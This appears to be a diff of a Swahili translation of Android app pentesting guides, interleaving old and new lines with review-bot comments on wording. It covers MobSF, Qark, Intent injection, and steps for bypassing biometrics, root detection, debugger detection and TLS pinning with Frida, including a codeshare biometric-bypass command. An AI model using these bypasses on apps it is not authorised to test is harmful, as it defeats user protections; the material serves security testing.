frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Mandharinyuma**
Unapoweka application katika mandharinyuma, Android huhifadhi **snapshot ya application** ili inaporejeshwa mbele (foreground) inaanza kupakia picha kabla ya application ili ionekane kama application ilipakiwa haraka zaidi.
Unapoiweka programu katika mandharinyuma, Android huhifadhi **snapshot ya programu** ili inaporudishwa mbele inaanza kupakia picha hiyo kabla ya app, hivyo inaonekana kama app ilipakia haraka zaidi.
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (tazama kwamba unahitaji root ili kuifikia).
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (kumbuka unahitaji root ili kuifikia).
Snapshots kawaida huhifadhiwa katika: **`/data/system_ce/0/snapshots`**
Snapshots kawaida huhifadhiwa hapa: **`/data/system_ce/0/snapshots`**
Android inatoa njia ya **kuzuia kunyakua screenshot kwa kuweka parameta ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanatendewa kama salama, kizuia kuonekana kwenye screenshots au kuonyeshwa kwenye displays zisizo salama.
Android inatoa njia ya **kuzuia kunakiliwa kwa screenshot kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na kuzuia yaonekana katika screenshots au kuonekana kwenye displays zisizo salama.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
### **Android Application Analyzer**
Zana hii inaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
Chombo hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
### Intent Injection
Waundaji mara nyingi huunda proxy components kama activities, services, na broadcast receivers ambazo zinashughulikia Intent hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Developers mara nyingi hufanya proxy components kama activities, services, na broadcast receivers zinazoshughulikia Intents hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Hatari iko katika kuwaruhusu watapeli kuanzisha non-exported app components au kupata content providers nyeti kwa kupeleka Intent hizi kwa njia isiyo sahihi. Mfano muhimu ni component ya `WebView` kubadilisha URLs kuwa vitu vya `Intent` kwa kutumia `Intent.parseUri(...)` kisha kuzitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
Hatari iko kwenye kuruhusu attackers kuanzisha non-exported app components au kupata access kwa sensitive content providers kwa kupindisha Intents hizi. Mfano muhimu ni component ya `WebView` kubadilisha URLs kuwa Intent objects kupitia `Intent.parseUri(...)` na kisha kuzitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
### Vidokezo Muhimu
### Essential Takeaways
- **Intent Injection** ni sawa na suala la wavuti la Open Redirect.
- Exploits zinahusisha kupitisha `Intent` objects kama extras, ambazo zinaweza kuelekezwa ili kutekeleza operesheni zisizo salama.
- Inaweza kufichua non-exported components na content providers kwa watapeli.
- Ubadilishaji wa URL kwenda `Intent` wa `WebView` unaweza kuwezesha vitendo visivyokusudiwa.
- **Intent Injection** ni sawa na tatizo la Open Redirect kwenye web.
- Exploits zinahusisha kupitisha `Intent` objects kama extras, ambazo zinaweza kualikwa upya ili kutekeleza operations zisizo salama.
- Inaweza kufichua non-exported components na content providers kwa attackers.
- Ubadilishaji wa URL kwa Intent kwenye `WebView` unaweza kuwezesha actions zisizokusudiwa.
### Android Client Side Injections and others
Pengine unajua kuhusu aina hii ya vulnerabilities kutoka Web. Lazima uwe mwangalifu hasa na vulnerabilities hizi katika Android application:
Labda unafahamu aina hizi za vulnerabilities kutoka Web. Lazima uwe waangalifu hasa na vulnerabilities hizi katika Android application:
- **SQL Injection:** Unaposhughulika na dynamic queries au Content-Providers hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Thibitisha kwamba msaada wa JavaScript na Plugin umezimwa kwa WebViews yoyote (imezimwa kwa default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na ufikiaji wa file system umezimwa (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika visa kadhaa, wakati Android application inamaliza session, cookie hairevokiwi au inaweza hata kuokolewa kwenye disk
- **JavaScript Injection (XSS):** Thibitisha kwamba JavaScript na Plugin support zimezimwa kwa WebViews yoyote (zimeteuliwa kuwa disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na access kwa file system zimezima (zimeteuliwa kuwa enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika visa kadhaa wakati android application inapomaliza session cookie haifutwi au inaweza hata kuokolewa kwenye disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
---
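Review bot: "### Essential Takeaways" replaces the translated "### Vidokezo Muhimu" with the English heading; keep the Swahili one. In the client-side injection bullets, "zimeteuliwa kuwa disabled by default" and "zimeteuliwa kuwa enabled by default" use "zimeteuliwa" (selected, appointed) where the earlier "imezimwa kwa default" / "umewezeshwa kwa default" said it plainly, and "WebViews zinapaswa kuwa na access kwa file system zimezima" mixes noun classes ("access ... zimezima"); the previous "ufikiaji wa file system umezimwa" agrees. Unrelated to this change but visible in the hunk: the FLAG_SECURE snippet `getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);` is fenced as bash although it is Java; tag the fence `java`.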
@ -597,55 +602,55 @@ Pengine unajua kuhusu aina hii ya vulnerabilities kutoka Web. Lazima uwe mwangal
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
**Uchambuzi wa static**
**Static analysis**
![](<../../images/image (866).png>)
**Tathmini ya vulnerabilities ya application** kwa kutumia frontend nzuri ya web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa mazingira).
**Vulnerability assessment of the application** kwa kutumia frontend nzuri ya web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa environment).
```bash
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```
Kumbuka kwamba MobSF inaweza kuchambua **Android**(apk)**, IOS**(ipa) **and Windows**(apx) programu (_Programu za Windows lazima zichunguzwe kutoka kwenye MobSF iliyosakinishwa kwenye mwenyeji wa Windows_).\
Pia, ikiwa utaunda faili ya **ZIP** yenye msimbo wa chanzo wa app ya **Android** au **IOS** (nenda kwenye folda ya mizizi ya program, chagua kila kitu na tengeneza faili ya ZIP), MobSF itaweza kuichambua pia.
Note that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Pia, ikiwa utaunda faili la **ZIP** lenye source code ya app ya **Android** au **IOS** (nenda kwenye root folder ya application, chagua kila kitu na unda ZIPfile), itauweza kuchambua pia.
MobSF pia inakuwezesha kufanya **diff/Compare** ya uchambuzi na kuingiza **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuiwezesha: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, kisha **hash** itapakiwa badala ya faili.
MobSF pia inakuwezesha kufanya **diff/Compare** ya analysis na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuifanya iwe enabled: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi the **hash** itapakiwa badala ya faili.
### Iliyosaidiwa Dynamic analysis na MobSF
### Assisted Dynamic analysis with MobSF
**MobSF** pia inaweza kuwa msaada mkubwa kwa **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusakinisha MobSF na **genymotion** kwenye host yako (VM au Docker haitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** can:
**MobSF** inaweza pia kuwa msaada mkubwa kwa **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusanisha MobSF na **genymotion** kwenye host yako (VM au Docker haitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** inaweza:
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanywa kiotomatiki isipokuwa kwa screenshots — unahitaji kubofya unapotaka screenshot au kubofya "**Exported Activity Tester**" ili kupata screenshots za exported activities zote.
- **Dump application data** (URLs, logs, clipboard, screenshots ulizofanya mwenyewe, screenshots zilizofanywa na "**Exported Activity Tester**", emails, SQLite databases, XML files, na faili nyingine zilizoundwa). Haya yote hufanywa moja kwa moja isipokuwa screenshots, lazima ubofye wakati unataka screenshot au lazima ubofye "**Exported Activity Tester**" ili kupata screenshots za exported activities zote.
- Capture **HTTPS traffic**
- Tumia **Frida** kupata **runtime** **information**
- Use **Frida** to obtain **runtime** **information**
Kuanzia toleo la **Android** > 5, itaanza **Frida** kiotomatiki na itaweka mipangilio ya **global proxy** kunasa trafiki. Itakanasa trafiki kutoka kwa application inayojaribiwa pekee.
Kutoka kwenye Android **versions > 5**, itaanzisha **Frida** kiotomatiki na itaweka global **proxy** settings ili **capture** traffic. Itakamata traffic tu kutoka kwa application inayojaribiwa.
**Frida**
Kwa default, pia itatumia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na ili **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kukamata **screenshots** zao na kuzihifadhi kwa ajili ya ripoti.
Kwa default, itatumia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na pia **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kuchukua **screenshots** zao na **kuzi hifadhi** kwa ajili ya report.
Ili **start** mtihani wa dynamic bonyeza kitufe cha kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona miito yote kwa methods zilizopigwa hook, arguments zilizopita na values zilizorejeshwa (hii itaonekana baada ya kubonyeza "Start Instrumentation").\
MobSF pia inakuwezesha kupakia **Frida scripts** zako mwenyewe (kutuma matokeo ya Frida scripts zako kwa MobSF tumia function `send()`). Pia ina **several pre-written scripts** unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha "**Start Instrumentation**" (utaweza kuona logs za scripts hizo ndani ya "**Frida Live Logs**").
Ili **kuanza** dynamic testing bonyeza button ya kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona invoke zote za hooked methods, arguments zilizotumika na returned values (hii itaonekana baada ya kubofya "Start Instrumentation").\
MobSF pia inakuwezesha kupakia Frida scripts zako mwenyewe (kutuma matokeo ya Frida scripts zako kwa MobSF tumia function `send()`). Pia ina **several pre-written scripts** ambazo unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha "**Start Instrumentation**" (utaweza kuona logs za script hizo ndani ya "**Frida Live Logs**").
![](<../../images/image (419).png>)
Zaidi ya hayo, una baadhi ya functionalities za ziada za Frida:
Zaidi ya hayo, una baadhi ya Auxiliary Frida functionalities:
- **Enumerate Loaded Classes**: Itachapisha classes zote zilizopakiwa
- **Capture Strings**: Itachapisha strings zote zinazokamatwa wakati wa kutumia application (ina “noise” nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Ita **show the 2 strings being compared** na kama matokeo yalikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itachapisha methods zote za class.
- **Capture Strings**: Itachapisha strings zote zinazopigwa capture wakati wa kutumia application (inatoa noise nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Itaonyesha **strings mbili zinazolinganishwa** na kama result ilikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itachapisha methods zote za class hiyo.
- **Search Class Pattern**: Tafuta classes kwa pattern
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF inatTrace several interesting Android Api methods.
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF inafuatilia baadhi ya Android Api methods zinazovutia.
Mara baada ya kuchagua module ya ziada unayotaka kutumia unahitaji kubonyeza "**Start Intrumentation**" na utaona matokeo yote katika "**Frida Live Logs**".
Mara baada ya kuchagua module ya auxiliary unayotaka kutumia lazima ubofye "**Start Intrumentation**" na utaona outputs zote ndani ya "**Frida Live Logs**".
**Shell**
MobSF pia inakuja na shell yenye baadhi ya amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
MobSF pia inakuleta shell yenye baadhi ya amri za **adb**, amri za **MobSF**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
```bash
help
shell ls
@ -654,34 +659,34 @@ exported_activities
services
receivers
```
**Zana za HTTP**
**Vifaa vya HTTP**
When http traffic is capture you can see an ugly view of the captured traffic on "**HTTP(S) Traffic**" bottom or a nicer view in "**Start HTTPTools**" green bottom. From the second option, you can **send** the **captured requests** to **proxies** like Burp or Owasp ZAP.\
To do so, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Wakati trafiki ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye kitufe cha chini "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Once you finish the dynamic analysis with MobSF you can press on "**Start Web API Fuzzer**" to **fuzz http requests** an look for vulnerabilities.
Baada ya kumaliza dynamic analysis na MobSF unaweza kubofya "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
> [!TIP]
> After performing a dynamic analysis with MobSF the proxy settings me be misconfigured and you won't be able to fix them from the GUI. You can fix the proxy settings by doing:
> Baada ya kufanya dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imechafuka na hautaweza kuirekebisha kupitia GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
> ```
### Assisted Dynamic Analysis with Inspeckage
### Uchambuzi wa Dynamic Ulio kusaidiwa na Inspeckage
You can get the tool from [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
This tool with use some **Hooks** to let you know **what is happening in the application** while you perform a **dynamic analysis**.
Unaweza kupata zana kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Zana hii itatumia baadhi ya **Hooks** kukujulisha **kinachoendelea katika application** huku ukifanya **dynamic analysis**.
### [Yaazhini](https://www.vegabird.com/yaazhini/)
Hii ni zana nzuri ya kufanya **static analysis kwa GUI**
Hii ni **zana nzuri za kufanya static analysis kwa GUI**
![](<../../images/image (741).png>)
### [Qark](https://github.com/linkedin/qark)
Zana hii imeundwa kutafuta kadhaa za **security related Android application vulnerabilities**, ama katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda **"Proof-of-Concept" deployable APK** na **ADB commands**, ili ku-exploit baadhi ya vulnerabilities zilizopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya root test device.
Zana hii imeundwa kutafuta udhaifu mbalimbali zinazohusiana na **security** za Android application, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda "Proof-of-Concept" deployable APK na **ADB commands**, ili ku-exploit baadhi ya udhaifu uliopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
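Review bot: the retranslated line "Ili kufanya hivyo, _power on Burp -->_ ..." carries over two defects from the old line: "MobSB HTTPTools" (the tool is MobSF) and the stray backslashes inside the link text `[http://127.0.0.1:8080\\](http://127.0.0.1:8080)`, which render literally. Fix both while the line is touched; the rest of the hunk reads fine.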
@ -691,21 +696,21 @@ qark --java path/to/specific/java/file.java
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
- Inaonyesha faili zote zilizotolewa kwa rejea rahisi
- Inafanya decompile faili za APK kwenda muundo wa Java na Smali kwa otomatiki
- Inachambua AndroidManifest.xml kwa udhaifu wa kawaida na tabia
- Uchambuzi wa msimbo wa chanzo (static) kwa udhaifu wa kawaida na tabia
- Hufanya decompile kwa faili za APK kwa njia ya otomatiki hadi muundo wa Java na Smali
- Huchambua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida
- Uchambuzi wa msimbo wa chanzo wa static kwa ajili ya udhaifu na tabia za kawaida
- Taarifa za kifaa
- na zaidi
- na mengi zaidi
```bash
reverse-apk relative/path/to/APP.apk
```
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER ni command-line application inayoweza kutumika kwenye Windows, MacOS X na Linux, inayochambua faili za _.apk_ ili kutafuta vulnerabilities. Hii inafanywa kwa kuzipanua APKs na kutekeleza mfululizo wa sheria ili kugundua vulnerabilities hizo.
SUPER ni programu ya mstari wa amri inayoweza kutumika kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ kutafuta vulnerabilities. Inafanya hivyo kwa kuzipakua APKs na kutumia mfululizo wa kanuni kugundua vulnerabilities hizo.
Sheria zote zimetengwa katika faili ya `rules.json`, na kila kampuni au mtapimaji anaweza kuunda sheria zake kuchambua wanazohitaji.
Kanuni zote ziko katika faili la `rules.json`, na kila kampuni au mjaribu anaweza kuunda kanuni zao ili kuchambua wanazohitaji.
Pakua latest binaries kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
Pakua binaries za hivi karibuni kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
```
super-analyzer {apk_file}
```
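Review bot: the new SUPER description replaces "kuzipanua APKs" with "kuzipakua APKs", which changes "decompressing the APKs" into "downloading the APKs" and misstates how the tool works (it unpacks the APK and runs rules over it). Keep "kuzipanua" (or "kuzifungua") in the line beginning "SUPER ni programu ya mstari wa amri".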
@ -715,15 +720,15 @@ super-analyzer {apk_file}
StaCoAn ni zana ya **crossplatform** inayowasaidia developers, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye mobile applications.
Dhana ni kwamba unavuta na kuacha faili ya mobile application yako (.apk au .ipa) kwenye application ya StaCoAn na itaunda ripoti ya kuona na inayobebeka kwako. Unaweza kubinafsisha settings na wordlists ili kupata uzoefu uliobinafsishwa.
Mfumo ni kwamba una-vuta na kuacha faili ya programu yako ya simu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na rahisi kubeba kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliobinafsishwa.
Pakua[ latest release](https://github.com/vincentcox/StaCoAn/releases):
Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
./stacoan
```
### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kupata udhaifu wa usalama unaowezekana katika programu za Android.\
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za usalama zinazoweza kuwepo katika programu za Android.\
[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
```
python androbugs.py -f [APK file]
@ -731,11 +736,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni zana ambayo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia zinazoweza kuwa za hatari zinazotengenezwa na programu ya Android.
**Androwarn** ni zana ambalo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia hatari zinazoweza kutengenezwa na programu ya Android.
Ugunduzi hufanywa kwa kutumia **static analysis** ya Dalvik bytecode ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Ugundaji hufanywa kwa kupitia **static analysis** ya bytecode ya programu ya Dalvik, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Zana hii inatafuta **common behavior of "bad" applications** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
Zana hii inaangalia **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
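Review bot: two regressions here. The line "Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):" swaps the old Swahili "Pakua" for English and keeps the space inside the link text; it should read "Pakua [latest release](https://github.com/vincentcox/StaCoAn/releases):". And "zana ambalo lengo lake" breaks the noun-class agreement the old line had right; "zana" takes "ambayo".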
@ -743,9 +748,9 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** ni Mobile Application Reverse engineering and Analysis Framework. Ni chombo kinachokusanya zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika testing mobile applications dhidi ya OWASP mobile security threats. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa mobile application developers na security professionals.
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayoweka pamoja zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika kujaribu mobile applications dhidi ya OWASP mobile security threats. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa mobile application developers na security professionals.
Inaweza:
It is able to:
- Extract Java and Smali code using different tools
- Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
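Review bot: the MARA paragraph and the "It is able to:" line revert to English in a file whose other sections are translated; the old "Inaweza:" should stay, and the new first sentence should be translated as well (the bolded initials M/A/R/A can be kept inside a Swahili sentence).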
@ -756,11 +761,11 @@ Inaweza:
### Koodous
Useful to detect malware: [https://koodous.com/](https://koodous.com)
Inayofaa kutambua malware: [https://koodous.com/](https://koodous.com/)
## Obfuscating/Deobfuscating code
Kumbuka kwamba, kutegemea huduma na usanidi unaotumia kuobfuscate code, Secrets huenda zikabaki obfuscated au la.
Kumbuka kwamba, kulingana na service na configuration unayotumia kuobfuscate the code, secrets zinaweza au zisiwe obfuscated.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
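Review bot: "kuobfuscate the code" in the new line "Kumbuka kwamba, kulingana na service na configuration ..." splices an English noun phrase into the Swahili sentence; the old "kuobfuscate code" (or "ku-obfuscate msimbo") reads better. The trailing-slash change to the Koodous URL is harmless.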
@ -772,7 +777,7 @@ ProGuard is distributed as part of the Android SDK and runs when building the ap
Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
(Kutoka katika mwongozo huo) Mara ya mwisho tulipoangalia, Dexguard mode of operation ilikuwa:
(From that guide) Last time we checked, the Dexguard mode of operation was:
- load a resource as an InputStream;
- feed the result to a class inheriting from FilterInputStream to decrypt it;
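Review bot: the new line "(From that guide) Last time we checked, the Dexguard mode of operation was:" replaces a correct Swahili translation with the English original; revert to the old line "(Kutoka katika mwongozo huo) Mara ya mwisho tulipoangalia ...".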
@ -784,11 +789,11 @@ Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexgu
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
You can upload an obfuscated APK to their platform.
Unaweza upload an obfuscated APK kwenye platform yao.
### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app
This is a LLM tool to find any potential security vulnerabilities in android apps and deobfuscate android app code. Uses Google's Gemini public API.
Hii ni zana ya LLM kutafuta potential security vulnerabilities katika android apps na deobfuscate android app code. Inatumia Google's Gemini public API.
### [Simplify](https://github.com/CalebFenton/simplify)
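Review bot: the heading "### [Deobfuscate android App]https://github.com/In3tinct/deobfuscate-android-app" has no parentheses around the URL, so it renders as plain text instead of a link; it is context here, but since the hunk edits the lines around it, fix it to `### [Deobfuscate android App](https://github.com/In3tinct/deobfuscate-android-app)`. The new line "Unaweza upload an obfuscated APK kwenye platform yao" also leaves half the sentence untranslated; "Unaweza kupakia APK iliyo-obfuscated kwenye platform yao" keeps the meaning.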
@ -806,7 +811,7 @@ APKiD gives you information about **how an APK was made**. It identifies many **
### [Androl4b](https://github.com/sh4hin/Androl4b)
AndroL4b ni Android security virtual machine based on ubuntu-mate, inajumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa different security geeks na researchers kwa reverse engineering na malware analysis.
AndroL4b ni Android security virtual machine inayotegemea ubuntu-mate inayojumuisha mkusanyiko wa latest framework, tutorials na labs kutoka kwa security geeks na researchers kwa ajili ya reverse engineering na malware analysis.
## References

View File

@ -2,14 +2,14 @@
{{#include ../../banners/hacktricks-training.md}}
Ukurasa huu unatoa mtiririko wa vitendo ili kupata tena dynamic analysis dhidi ya apps za Android zinazotambua au kuzuia instrumentation kwa sababu ya root, au kushikilia TLS pinning. Unalenga triage ya haraka, utambuzi wa kawaida, na copypasteable hooks/tactics za kuzipitisha bila ku-repack inapowezekana.
Ukurasa huu unaorodhesha mtiririko wa vitendo ili kurejesha dynamic analysis dhidi ya programu za Android zinazogundua/kuzuia instrumentation kwa root au kutekeleza TLS pinning. Unalenga triage ya haraka, ugunduzi wa kawaida, na hooks/tactics za nakili-na-wekewa (copypasteable) ili kuzipita bila kujaribu repacking inapowezekana.
## Detection Surface (ambacho apps zinakagua)
## Detection Surface (what apps check)
- Ukaguzi wa root: su binary, Magisk paths, getprop values, common root packages
- Uhakiki wa Frida/debugger (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), scanning /proc, classpath, loaded libs
- Antidebug ya native: ptrace(), syscalls, antiattach, breakpoints, inline hooks
- Ukaguzi wa init mapema: Application.onCreate() or process start hooks ambazo hu-crash ikiwa instrumentation ipo
- Root checks: su binary, Magisk paths, getprop values, common root packages
- Frida/debugger checks (Java): Debug.isDebuggerConnected(), ActivityManager.getRunningAppProcesses(), getRunningServices(), scanning /proc, classpath, loaded libs
- Native antidebug: ptrace(), syscalls, antiattach, breakpoints, inline hooks
- Early init checks: Application.onCreate() or process start hooks that crash if instrumentation is present
- TLS pinning: custom TrustManager/HostnameVerifier, OkHttp CertificatePinner, Conscrypt pinning, native pins
## Step 1 — Quick win: hide root with Magisk DenyList
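Review bot: the four Swahili bullets under the Detection Surface heading are replaced by their English originals ("Root checks: ...", "Frida/debugger checks (Java): ...", "Native antidebug: ...", "Early init checks: ..."), and the heading parenthetical becomes English too. Only the fifth bullet ("TLS pinning: custom TrustManager/HostnameVerifier, OkHttp CertificatePinner, Conscrypt pinning, native pins") is genuinely new, so keep the Swahili bullets and translate the TLS pinning one in the same style, e.g. "TLS pinning: TrustManager/HostnameVerifier maalum, OkHttp CertificatePinner, Conscrypt pinning, native pins".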
@ -18,14 +18,14 @@ Ukurasa huu unatoa mtiririko wa vitendo ili kupata tena dynamic analysis dhidi y
- Enable DenyList, add the target package
- Reboot and retest
Apps nyingi hutafuta tu viashiria vinavyoonekana (su/Magisk paths/getprop). DenyList mara nyingi hu-neutralize ukaguzi wa kijana.
Programu nyingi huangalia tu viashiria vinavyoonekana (su/Magisk paths/getprop). DenyList mara nyingi huondoa ukaguzi wa aina hiyo.
References:
- Magisk (Zygisk & DenyList): https://github.com/topjohnwu/Magisk
## Step 2 — 30second Frida Codeshare tests
Jaribu scripts za dropin za kawaida kabla ya kuchimba kwa undani:
Jaribu scripts za kawaida za dropin kabla ya kuchimba kwa undani:
- anti-root-bypass.js
- anti-frida-detection.js
@ -35,13 +35,13 @@ Example:
```bash
frida -U -f com.example.app -l anti-frida-detection.js
```
Hizi kwa kawaida huwa stub Java root/debug checks, process/service scans, na native ptrace(). Zinatumika kwenye apps zenye ulinzi mdogo; malengo yaliyoimarishwa yanaweza kuhitaji hooks maalum.
Hizi kwa kawaida stub Java root/debug checks, process/service scans, na native ptrace(). Zinasaidia kwenye apps zilizo na ulinzi mdogo; hardened targets zinaweza kuhitaji tailored hooks.
